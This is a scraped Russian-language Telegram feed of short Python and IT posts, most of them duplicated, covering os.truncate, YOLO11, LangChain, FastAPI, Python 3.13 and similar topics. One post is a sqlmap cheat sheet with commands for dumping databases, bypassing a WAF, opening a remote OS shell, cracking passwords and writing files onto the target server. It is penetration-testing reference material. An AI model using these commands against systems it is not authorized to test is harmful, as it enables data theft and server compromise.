Что делает метод truncate()?
Метод truncate() из модуля os позволяет обрезать файл по указанному пути path, устанавливая его длину не более length байтов.
Синтаксис:
os.truncate(path, length), где path — строка, представляющая путь к файлу в файловой системе, а length — целое число, определяющее размер в байтах.
Подробнее про этот метод здесь https://docs-python.ru/standart-library/modul-os-python/funktsija-truncate-modulja-os/.
@python_be1
https://docs-python.ru/standart-library/modul-os-python/funktsija-truncate-modulja-os/
Метод truncate() из модуля os позволяет обрезать файл по указанному пути path, устанавливая его длину не более length байтов.
Синтаксис:
os.truncate(path, length), где path — строка, представляющая путь к файлу в файловой системе, а length — целое число, определяющее размер в байтах.
Подробнее про этот метод здесь https://docs-python.ru/standart-library/modul-os-python/funktsija-truncate-modulja-os/.
@python_be1
https://docs-python.ru/standart-library/modul-os-python/funktsija-truncate-modulja-os/
🔐 Шпаргалка по использованию sqlmap
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
🌟 Базовый скан URL на наличие уязвимостей:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1"</pre>
🌟 Автоматический дамп всех баз данных:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —dbs</pre>
🌟 Извлечение таблиц из конкретной базы данных:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных —tables</pre>
🌟 Извлечение данных из конкретной таблицы:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы —dump</pre>
🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —user-agent="Mozilla/5.0"</pre>
🌟 Подбор базы данных и получение информации о пользователях:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —current-db —current-user</pre>
🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —os-shell</pre>
🌟 Выполнение SQL-запросов вручную:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —sql-query "SELECT user, password FROM users"</pre>
🌟 Проверка на возможность подключения с правами администратора:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —is-dba</pre>
🌟 Брутфорсирование паролей пользователей:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —passwords</pre>
🌟 Загрузка файла на удаленный сервер:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —file-write="/path/to/local/file" —file-dest="/path/to/remote/file"</pre>
🌟 Получение списка столбцов из таблицы:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы —columns</pre>
🌟 Использование прокси-сервера:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —proxy="http://127.0.0.1:8080"</pre>
🌟 Определение используемой базы данных и версии:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —banner</pre>
🌟 Атака на POST-запросы (если параметры передаются в теле):
<pre language="shell">
sqlmap -u "http://example.com/login.php" —data="username=admin&password=admin"</pre>
@linuxkalii
@python_be1
SQLMAP — это инструмент для проникновения с открытым исходным кодом.
SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
🌟 Базовый скан URL на наличие уязвимостей:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1"</pre>
🌟 Автоматический дамп всех баз данных:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —dbs</pre>
🌟 Извлечение таблиц из конкретной базы данных:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных —tables</pre>
🌟 Извлечение данных из конкретной таблицы:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы —dump</pre>
🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —user-agent="Mozilla/5.0"</pre>
🌟 Подбор базы данных и получение информации о пользователях:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —current-db —current-user</pre>
🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —os-shell</pre>
🌟 Выполнение SQL-запросов вручную:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —sql-query "SELECT user, password FROM users"</pre>
🌟 Проверка на возможность подключения с правами администратора:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —is-dba</pre>
🌟 Брутфорсирование паролей пользователей:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —passwords</pre>
🌟 Загрузка файла на удаленный сервер:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —file-write="/path/to/local/file" —file-dest="/path/to/remote/file"</pre>
🌟 Получение списка столбцов из таблицы:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы —columns</pre>
🌟 Использование прокси-сервера:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —proxy="http://127.0.0.1:8080"</pre>
🌟 Определение используемой базы данных и версии:
<pre language="shell">
sqlmap -u "http://example.com/page.php?id=1" —banner</pre>
🌟 Атака на POST-запросы (если параметры передаются в теле):
<pre language="shell">
sqlmap -u "http://example.com/login.php" —data="username=admin&password=admin"</pre>
@linuxkalii
@python_be1
👍1
✔️ YOLO11: новая эра в компьютерном зрении.
Компания Ultralytics представила YOLO11, новейшую версию своей знаменитой модели искусственного интеллекта для компьютерного зрения.
YOLO11 поддерживает широкий спектр задач CV: обнаружение объектов, сегментацию экземпляров, классификацию изображений, оценку позы, обнаружение ориентированных объектов (OBB) и отслеживание объектов. Модель получила улучшенное извлечение признаков.
YOLO11m достигает более высокого балла средней средней точности (mAP) в наборе данных COCO, используя на 22% меньше параметров, чем YOLOv8m.
YOLO11 вскоре будет доступна через Ultralytics HUB и пакет Ultralytics Python.
ultralytics.com (https://www.ultralytics.com/ru/blog/ultralytics-yolo11-has-arrived-redefine-whats-possible-in-ai)
@python_be1
Компания Ultralytics представила YOLO11, новейшую версию своей знаменитой модели искусственного интеллекта для компьютерного зрения.
YOLO11 поддерживает широкий спектр задач CV: обнаружение объектов, сегментацию экземпляров, классификацию изображений, оценку позы, обнаружение ориентированных объектов (OBB) и отслеживание объектов. Модель получила улучшенное извлечение признаков.
YOLO11m достигает более высокого балла средней средней точности (mAP) в наборе данных COCO, используя на 22% меньше параметров, чем YOLOv8m.
YOLO11 вскоре будет доступна через Ultralytics HUB и пакет Ultralytics Python.
ultralytics.com (https://www.ultralytics.com/ru/blog/ultralytics-yolo11-has-arrived-redefine-whats-possible-in-ai)
@python_be1
👍1
🖥 Курс по основам программирования Linux (https://stepik.org/course/548/promo?search=5483640478) предлагает уникальную возможность изучения не только теории, но и практики работы с операционной системой. В рамках курса вы научитесь управлять процессами, писать сетевые приложения, а также узнаете, как Linux работает с многопоточностью.
Помимо этого, курс предоставляет доступ к реальным инструментам, которые активно используются разработчиками со всего мира. Вы сможете изучить системные вызовы и понять, как взаимодействуют между собой программы в ОС.
Этот курс — настоящая находка для начинающих программистов: ссылка на курс (https://stepik.org/course/548/promo?search=5483640478). (https://stepik.org/course/548/promo?search=5483640478)
#курс #программирование #linux #ru
@python_be1
Помимо этого, курс предоставляет доступ к реальным инструментам, которые активно используются разработчиками со всего мира. Вы сможете изучить системные вызовы и понять, как взаимодействуют между собой программы в ОС.
Этот курс — настоящая находка для начинающих программистов: ссылка на курс (https://stepik.org/course/548/promo?search=5483640478). (https://stepik.org/course/548/promo?search=5483640478)
#курс #программирование #linux #ru
@python_be1
👍1
🔍 Нотация Big O 101: Секрет написания эффективных алгоритмов
О-большое (Big O) – это специальная нотация, используемая для описания асимптотической сложности; то есть, скорости роста времени выполнения алгоритма с увеличением размера входных данных.
Это нужно, чтобы понимать, насколько быстро или медленно работают алгоритмы. В О-большом нет коэффициентов, минут, секунд и так далее. Об этом будет наглядно показано в примере про логарифмическую сложность O(log n).
@python_be1
О-большое (Big O) – это специальная нотация, используемая для описания асимптотической сложности; то есть, скорости роста времени выполнения алгоритма с увеличением размера входных данных.
Это нужно, чтобы понимать, насколько быстро или медленно работают алгоритмы. В О-большом нет коэффициентов, минут, секунд и так далее. Об этом будет наглядно показано в примере про логарифмическую сложность O(log n).
@python_be1
👍1
🖥 Новый тренд программирования в Python – LangChain
LangChain — это мощная библиотека, которая облегчает создание приложений на основе языковых моделей. Она позволяет интегрировать различные компоненты: от работы с API до обработки текста и динамического создания запросов к LLM через API.🌐
🔍 Подробности об использовании LangChain (https://python.langchain.com/docs/introduction/)
💡 С помощью LangChain можно легко создавать ассистентов, chatbots и многое другое. Не упустите шанс изучить его возможности!
@pythonl (http://t.me/pythonl)
@python_be1
LangChain — это мощная библиотека, которая облегчает создание приложений на основе языковых моделей. Она позволяет интегрировать различные компоненты: от работы с API до обработки текста и динамического создания запросов к LLM через API.🌐
🔍 Подробности об использовании LangChain (https://python.langchain.com/docs/introduction/)
💡 С помощью LangChain можно легко создавать ассистентов, chatbots и многое другое. Не упустите шанс изучить его возможности!
@pythonl (http://t.me/pythonl)
@python_be1
👍1
🖥 TurboAsync
Этот проект - попытка создать многопоточный цикл обработки событий, совместимый с asyncio.
То есть вы, наконец, сможете использовать asyncio и сделать его многопоточным!
Тут объяснение, (https://www.neilbotelho.com/blog/multithreaded-async.html) в котором подробно описано, почему и как работает этот проект.
🔗 Github (https://github.com/NeilBotelho/turboAsync)
@pythonl (https://t.me/pythonl)
@python_be1
Этот проект - попытка создать многопоточный цикл обработки событий, совместимый с asyncio.
То есть вы, наконец, сможете использовать asyncio и сделать его многопоточным!
Тут объяснение, (https://www.neilbotelho.com/blog/multithreaded-async.html) в котором подробно описано, почему и как работает этот проект.
🔗 Github (https://github.com/NeilBotelho/turboAsync)
@pythonl (https://t.me/pythonl)
@python_be1
👍1
👩💻 Пет-проект (https://www.youtube.com/watch?v=gBfkX9H3szQ) на Python за 50 минут. Курс по FastAPI для начинающих (2024)
💡 В видео рассматривается создание простого проекта на Python с использованием FastAPI. Обсуждаются основные концепции, такие как маршрутизация, обработка запросов и использование зависимости. Программа охватывает создание RESTful API, работу с параметрами, развертывание приложения через Docker а также интеграцию с базой данных. Также приведены советы по развертыванию приложения и тестированию. Это видео подходит для начинающих, желающих быстро освоить FastAPI
🕞 Продолжительность: 50:00
🇷🇺 Видео на русском языке!
🔗 Ссылка: *клик* (https://www.youtube.com/watch?v=gBfkX9H3szQ)
#курс #python #docker #fastapi
@python_job_interview
@python_be1
💡 В видео рассматривается создание простого проекта на Python с использованием FastAPI. Обсуждаются основные концепции, такие как маршрутизация, обработка запросов и использование зависимости. Программа охватывает создание RESTful API, работу с параметрами, развертывание приложения через Docker а также интеграцию с базой данных. Также приведены советы по развертыванию приложения и тестированию. Это видео подходит для начинающих, желающих быстро освоить FastAPI
🕞 Продолжительность: 50:00
🇷🇺 Видео на русском языке!
🔗 Ссылка: *клик* (https://www.youtube.com/watch?v=gBfkX9H3szQ)
#курс #python #docker #fastapi
@python_job_interview
@python_be1
👍1
Математика в запросах SQL
В SQL-запросах есть возможность использовать результаты математических вычислений, причем мы можем как выводить результаты математических вычислений в SELECT, так и использовать математические выражения в условиях отбора строк WHERE. В этом видеоуроке автор подробно разбирает данную функцию.
Смотреть это видео на youtube: youtu.be/4BnxMB-VtVY
@python_be1
https://youtu.be/4BnxMB-VtVY
В SQL-запросах есть возможность использовать результаты математических вычислений, причем мы можем как выводить результаты математических вычислений в SELECT, так и использовать математические выражения в условиях отбора строк WHERE. В этом видеоуроке автор подробно разбирает данную функцию.
Смотреть это видео на youtube: youtu.be/4BnxMB-VtVY
@python_be1
https://youtu.be/4BnxMB-VtVY
YouTube
Урок 14. SQL. Математика в запросах.
В запросах SQL мы можем использовать результаты математических вычислений
причем мы можем выводить результаты математических вычислений, так и использовать математические выражения
в уловиях отбора строк WHERE
тестовая среда https://apex.oracle.com/pls/apex/…
причем мы можем выводить результаты математических вычислений, так и использовать математические выражения
в уловиях отбора строк WHERE
тестовая среда https://apex.oracle.com/pls/apex/…
👍1
🖥 MinerU (https://github.com/opendatalab/MinerU) — это инструмент, который преобразует PDF-файлы в машиночитаемые форматы (например, markdown, JSON), что позволяет легко извлекать их в любой формат
❓ Основные характеристики:
🌟 Удаляет такие элементы, как верхние и нижние колонтитулы, сноски и номера страниц, сохраняя при этом семантическую непрерывность
🌟 Выводит текст из многоколоночных документов в удобном для восприятия виде
🌟 Сохраняет исходную структуру документа, включая заголовки, абзацы и списки
🌟 Извлекает изображения, подписи к изображениям, таблицы и подписи к таблицам
🌟 Автоматически распознает формулы в документе и преобразует их в LaTeX
🌟 Автоматически распознает таблицы в документе и преобразует их в LaTeX
🌟 Автоматически обнаруживает и включает функцию OCR для поврежденных PDF-файлов
🌟 Поддерживает как CPU, так и GPU среды
🌟 Поддерживает платформы Windows, Linux и Mac
🔐 Лицензия: AGPL-3.0
▪️Github (https://github.com/opendatalab/MinerU)
@pythonl
@python_be1
❓ Основные характеристики:
🌟 Удаляет такие элементы, как верхние и нижние колонтитулы, сноски и номера страниц, сохраняя при этом семантическую непрерывность
🌟 Выводит текст из многоколоночных документов в удобном для восприятия виде
🌟 Сохраняет исходную структуру документа, включая заголовки, абзацы и списки
🌟 Извлекает изображения, подписи к изображениям, таблицы и подписи к таблицам
🌟 Автоматически распознает формулы в документе и преобразует их в LaTeX
🌟 Автоматически распознает таблицы в документе и преобразует их в LaTeX
🌟 Автоматически обнаруживает и включает функцию OCR для поврежденных PDF-файлов
🌟 Поддерживает как CPU, так и GPU среды
🌟 Поддерживает платформы Windows, Linux и Mac
🔐 Лицензия: AGPL-3.0
▪️Github (https://github.com/opendatalab/MinerU)
@pythonl
@python_be1
👍1
Крутая методика позволяющая стать профессиональным программистом Python. Короткий путь.
https://www.youtube.com/watch?v=P5K2mVAb3gk&t=11s
@python_be1
https://youtu.be/P5K2mVAb3gk
https://www.youtube.com/watch?v=P5K2mVAb3gk&t=11s
@python_be1
https://youtu.be/P5K2mVAb3gk
YouTube
Крутая методика позволяющая стать профессиональным программистом Python. Короткий путь.
В этом видео рассказано, что значит базовый уровень в программировании питон, так как многие путают, базовый уровень владения языком программирования от знакомства с языком программирования.
Планы обучение программированию Питон по индивидуальной программе.…
Планы обучение программированию Питон по индивидуальной программе.…
👍1
👩💻 Выпущена новая версия Python 3.13
Год разработки завершился публикацией новой версии выпуска Python 3.13.
В новой ветке поддержка будет осуществляться полтора года, затем еще три с половиной года для нее будут создаваться обновления, устраняющие уязвимости.
Альфа-тестирование ветки Python 3.14 (https://www.python.org/download/pre-releases/) начнется в ближайшие часы. Она будет находиться на стадии альфа-выпусков семь месяцев, в течение которых будут добавляться новые возможности и исправляться ошибки. По новому графику разработки, работа над новой веткой начинается за пять месяцев до релиза предыдущей ветки и достигает стадии альфа-тестирования к моменту очередного релиза. Затем в течение трех месяцев будет проходить тестирование бета-версий, где добавление новых возможностей будет запрещено, и вся энергия будет направлена на исправление ошибок. За два месяца до релиза ветка перейдет в стадию кандидата в релизы, где будет проведена окончательная стабилизация.
<code>❤️ Лайк за новую версию </code>
🔗 (https://uproger.com/vypushhena-novaya-versiya-python-3-13/)Скачать (https://www.python.org/downloads/release/python-3130/)
🔗 Список обновлений (https://uproger.com/vypushhena-novaya-versiya-python-3-13/)
@pythonl (https://t.me/pythonl)
@python_be1
Год разработки завершился публикацией новой версии выпуска Python 3.13.
В новой ветке поддержка будет осуществляться полтора года, затем еще три с половиной года для нее будут создаваться обновления, устраняющие уязвимости.
Альфа-тестирование ветки Python 3.14 (https://www.python.org/download/pre-releases/) начнется в ближайшие часы. Она будет находиться на стадии альфа-выпусков семь месяцев, в течение которых будут добавляться новые возможности и исправляться ошибки. По новому графику разработки, работа над новой веткой начинается за пять месяцев до релиза предыдущей ветки и достигает стадии альфа-тестирования к моменту очередного релиза. Затем в течение трех месяцев будет проходить тестирование бета-версий, где добавление новых возможностей будет запрещено, и вся энергия будет направлена на исправление ошибок. За два месяца до релиза ветка перейдет в стадию кандидата в релизы, где будет проведена окончательная стабилизация.
<code>❤️ Лайк за новую версию </code>
🔗 (https://uproger.com/vypushhena-novaya-versiya-python-3-13/)Скачать (https://www.python.org/downloads/release/python-3130/)
🔗 Список обновлений (https://uproger.com/vypushhena-novaya-versiya-python-3-13/)
@pythonl (https://t.me/pythonl)
@python_be1
👍1